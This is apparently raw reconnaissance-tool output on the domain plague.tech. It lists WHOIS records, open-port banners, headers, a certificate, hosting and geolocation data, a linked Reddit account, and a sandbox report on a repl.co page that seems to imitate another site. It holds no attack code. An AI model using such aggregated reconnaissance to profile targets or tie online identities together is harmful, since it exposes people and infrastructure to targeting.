PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Name Server: ns4.myhostadmin.net Name Server: ns5.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en plague.tech 2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77ae523eff6ee12f-ORD 188.114.97.0 2022-12-18 00:09:35 Co-Hosted Site No HackerTarget 0 0 2 0 None onlimapotexttac.tk 104.21.28.240 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.128.0/20 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b265899d032ad2-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.137.37 2022-12-18 00:21:54 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 104.21.7.179 2022-12-18 00:21:58 BGP AS Membership No Censys 0 0 2 0 None 13335 2a06:98c1:3120::1 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None s4bskcnr4ocn.m7yke.repl.co 34.149.204.188 2022-12-18 00:25:39 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-184.w90-116.abo.wanadoo.fr 90.116.149.184 2022-12-18 00:04:11 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.96.1 2022-12-18 00:05:57 Account on External Site No Account Finder 0 0 2 0 None Reddit (Category: social) https://www.reddit.com/user/zerotwo-best-waifu zerotwo-best-waifu 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 75 0 1 0 None 188.114.97.1 plague.fun 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ae242be84c2331-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243 2022-12-18 00:13:38 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None familiar@familiar.com.py [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "209.197.3.8:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cd4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_cd4_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cd4_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_cd4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3284"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cd4_IE_EarlyTabStart_0xa88_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_cd4_ConnHashTable<3284>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /resources/font-awesome/css/font-awesome.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/font-awesome/css/font-awesome.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/familiard7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/familiard7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/bootstrap/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/bootstrap/dist/css/bootstrap.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/commonsd7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/commonsd7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/datepicker.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/datepicker.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/familiar_margind7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/familiar_margind7ac.css?20102022 HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/bootstrap-select/css/bootstrap-select.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/bootstrap-select/css/bootstrap-select.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GET /resources/css/datepicker3.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "mozilla/5.0 (")\n "GET /resources/css/datepicker3.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive\nCookie: PHPSESSID=11aac534407b1ee5b3606bd7bea8e35a" (Indicator: "user-agent: ")\n "GE 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 2 0 None 8075 40.112.0.0/13 2022-12-18 00:04:02 Physical Location No ipstack 0 0 2 0 None United States 104.21.7.179 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2053 188.114.97.1 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.96.9 2022-12-18 00:13:48 Web Content Language No Language Detector 0 0 3 0 None English 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:19:05 Raw Data from RIRs No ipapi.co 0 0 3 0 None {u'region_code': u'52', u'country_tld': u'.it', u'ip': u'81.88.48.101', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Florence', u'network': u'81.88.48.0/24', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 43.7891, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'50135', u'asn': u'AS39729', u'country': u'IT', u'region': u'Tuscany', u'longitude': 11.2356, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 81.88.48.101 2022-12-18 00:21:44 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2ce246b792a2d-ORD Content-Encoding: gzip 2606:4700:3031::6815:7b3 2022-12-18 00:56:42 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: MISOGYNY.NET Registry Domain ID: 1847059997_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-09-15T18:46:12Z Creation Date: 2014-02-18T03:58:20Z Registry Expiry Date: 2023-02-18T03:58:20Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: 480-624-2505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS71.DOMAINCONTROL.COM Name Server: NS72.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:56:31Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: MISOGYNY.NET Registry Domain ID: 1847059997_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-02-18T09:18:55Z Creation Date: 2014-02-17T22:58:20Z Registrar Registration Expiration Date: 2023-02-17T22:58:20Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: Not Available From Registry Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Registry Admin ID: Not Available From Registry Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Registry Tech ID: Not Available From Registry Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=MISOGYNY.NET Name Server: NS71.DOMAINCONTROL.COM Name Server: NS72.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:56:41Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:09:36 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.12:80 188.114.96.0/24 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.229 81.88.52.232 2022-12-18 00:27:14 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.48.102:80 81.88.48.102 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 